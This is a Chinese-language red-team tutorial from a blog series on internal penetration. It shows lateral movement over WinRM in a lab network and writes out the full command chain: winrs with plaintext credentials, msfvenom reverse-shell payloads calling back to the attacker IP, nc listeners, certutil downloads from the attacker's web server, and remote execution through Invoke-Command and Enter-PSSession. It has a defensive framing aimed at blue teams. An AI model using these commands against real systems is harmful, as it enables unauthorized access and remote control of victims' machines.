一.前言
WinRM的远程管理服务是微软的WS-Management协议的实现。WS-Management协议是基于简单对象访问协议(SOAP)的防火墙友好的协议。在Windows 2008以上版本的操作系统中,WinRM服务都是自动开启的。WinRM的默认管理端口为5985。本篇文章将会介绍如何通过WinRM进行横向渗透。
二.前文推荐
ATT&CK视角下的红蓝对抗:一. 隧道穿透技术详解
ATT&CK视角下的红蓝对抗:二. 内网探测协议出网
ATT&CK视角下的红蓝对抗:三. 内网常规隧道利用方法
ATT&CK视角下的红蓝对抗:四. 内网穿透之通过Earthworm(EW)进行隧道穿透
ATT&CK视角下的红蓝对抗:五. 内网穿透之利用HTTP协议进行隧道穿透
ATT&CK视角下的红蓝对抗:六.内网穿透之利用FRP进行隧道穿透
ATT&CK视角下的红蓝对抗:七.内网穿透之利用Venom进行隧道穿透
ATT&CK视角下的红蓝对抗:八.内网穿透之利用Termite进行隧道穿透
ATT&CK视角下的红蓝对抗:九.内网穿透之利用GRE协议进行隧道穿透
ATT&CK视角下的红蓝对抗:十.内网穿透之利用DNS协议进行隧道穿透
ATT&CK视角下的红蓝对抗:十一.内网穿透之利用SSH协议进行隧道穿透
ATT&CK视角下的红蓝对抗:十二.内网穿透之Windows文件传输技术详解
ATT&CK视角下的红蓝对抗:十三.内网穿透之Linux文件传输技巧详解
ATT&CK视角下的红蓝对抗:十四.内网穿透之反弹流量分析与检测方法
ATT&CK视角下的红蓝对抗:十五.内网穿透之利用ICMP协议进行隧道穿透
ATT&CK视角下的红蓝对抗:十六.横向移动之利用Windows计划任务进行横向移动
ATT&CK视角下的红蓝对抗:十七.横向移动之利用远程服务进行横向渗透
ATT&CK视角下的红蓝对抗:十八.横向移动之利用WinRM进行横向渗透
三.利用WinRM进行横向渗透
WinRM的远程管理服务是微软的WS-Management协议的实现。WS-Management协议是基于简单对象访问协议(SOAP)的防火墙友好的协议。在Windows 2008以上版本的操作系统中,WinRM服务都是自动开启的。WinRM的默认管理端口为5985。利用WinRM进行横向渗透拓扑图如图1-1所示,实验环境如表1-1所示。
图1-1 利用WinRM进行横向渗透拓扑图表1-1 利用WinRM进行横向渗透实验环境
主机 | 服务类型 | IP地址 |
|---|---|---|
Kali 2022 | 攻击机 | 10.10.10.2 |
Windows 2012 R2 | 跳板机 | 10.10.10.3、192.168.1.2 |
Windows 2008 R2 | 核心靶标 | 10.10.10.4、192.168.1.3 |
1. WinRS
WinRS是Windows的远程Shell,相当于WinRM的客户端。使用WinRS可以访问运行有WinRM的服务器,可以与目标主机形成交互式会话。切换到跳板机,在没有加入域控的情况下,使用WinRS命令需先将靶标机器的IP加入客户端信任列表,在cmd和powershell下都可以使用命令将靶标机器的IP加入客户端信任列表中,如图1-2所示。
代码语言:javascript复制winrm set winrm/config/Client@{TrustedHosts="192.168.1.3"}
图1-2 加入信任列表使用命令winrs -r:http://192.168.1.3:5985 -u:administrator -p :Admin123.即可获取靶标机器的交互式会话,如图1-3所示。
图1-3 获取交互式会话2.Invoke-Command
Invoke-Command是一个 PowerShell命令,该命令可用于在远程机器上运行脚本或其他命令,并且可以同时在多台机器上运行命令。Invoke-Command使用WinRM服务在远程计算机上执行命令。要使用 Invoke-Command则必须在远程机器上具有适当的权限,并且WinRM服务必须在远程计算机上运行。首先,在攻击机上执行命令msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.2 lport=1342 -f exe > invoke.exe,生成一个可在目标机器上执行的回连攻击机程序,命令执行结果如图1-4所示。
图1-4生成回连攻击机程序生成回连攻击机程序后,使用命令nc -lvnp 1342去监听生成回连的端口1342,命令执行结果如图1-5所示。
图1-5 监听端口切换到跳板机,利用攻击机搭建的Web服务器,使用命令certutil -urlcache -split -f http://10.10.10.2:8080/invoke.exe C:invoke.exe通过certutil下载攻击机生成的回连攻击机程序,并将该文件保存到C盘根目录下,文件命名为invoke.exe,如图1-6所示。
图1-6 下载文件利用跳板机和靶标机器已建立的IPC连接,使用copy invoke.exe \192.168.1.3C$命令把invoke.exe文件复制到靶标机器的C盘根目录下,命令执行结果如图1-7所示。
图1-7 复制文件上文已经把靶标机器的IP加入了信任域,无须再添加。接下来在跳板机中使用Powershell运行Invoke-Command命令,输入Invoke-Command -ComputerName 192.168.1.3 -Credential administrator -Command {C:invoke.exe}命令来远程连接靶标机器,执行invoke.exe文件,命令执行结果如图1-8所示。
图1-8 使用Invoke-Command远程执行命令对图中的参数进行说明,如下。
-ComputerName:指定主机名/IP。
-Credential:指定目标用户名。
-Command:指定需要执行的程序。
我们返回到攻击机kali上查看回连端口情况,可以看到成功获取到靶标机器的权限,如图1-9所示。
图1-9 获得反弹SHELL3. Enter-PSSession
Enter-PSSession是Powershell自带的一条命令,主要用于与远程主机建立交互式会话。该命令与WinrRS具有同样的效果,都是通过WinRM建立连接的,且都能返回一个交互式会话。
1)在攻击机上,通过执行命令msfvenom -p windows/x64/shell_reverse_tcp lhost=10.10.10.2 lport=1345 -f exe > enter.exe生成一个可在靶标机器上执行的回连攻击机程序,命令执行结果如图1-10所示。
图1-10 生成回连攻击机程序2)使用命令nc -lvnp 1345监听回连端口,命令执行结果如图1-11所示。
图1-11 监听端口3)切换到跳板机,在powershell下使用命令New-PSSession -ComputerName 192.168.1.3 -Credential administrator -Port 5985与靶标机器创建远程交互会话,执行结果如图1-12所示,此时会弹出一个凭据请求要求你输入靶标机器administrator用户的凭据信息,输入正确密码通过验证后将会创建一个新会话,如图1-13所示。
图1-12 验证票据
图1-13 创建会话4)使用Enter-PSSession -name Session2命令进入交互式会话,如图1-14所示。
图1-14 进入交互式会话5)使靶标机器通过攻击机搭建的Web服务器去下载回连攻击机程序。使用命令certutil -urlcache -split -f http://10.10.10.2:8080/enter.exe C:enter.exe,
通过certutil下载攻击机kali生成的回连攻击机程序,将其直接下载到靶标机器的C盘根目录下,并命名为enter.exe。命令执行结果如图1-15所示。
图1-15 下载文件6)使用start enter.exe命令来运行回连攻击机程序,命令执行结果如图1-16所示。
图1-16 启动文件7)返回到攻击机,查看回连端口信息,可以看到已经获得靶标机器的权限,如图1-17所示。
图1-17 获取权限四.本篇总结
本文主要介绍了利用WinRM进行横向渗透的方法,读者阅读本章内容后就能够理解,红队人员一旦通过外部某一个点进入了企业内部网络之中,那么内网之中所有的安全防护设备将会形同虚设,红队人员在内网之中获取核心靶标的系统权限如同探囊取物。因此,如何有效地建立内网横向渗透安全防护体系就成了大部分企业及蓝队防守人员值得思考的问题,笔者希望通过本章对红队人员进行横向渗透所常利用的手法的介绍,读者能够对内网安全体系建设引起更多的重视和思考。
我正在参与2023腾讯技术创作特训营第三期有奖征文,组队打卡瓜分大奖!
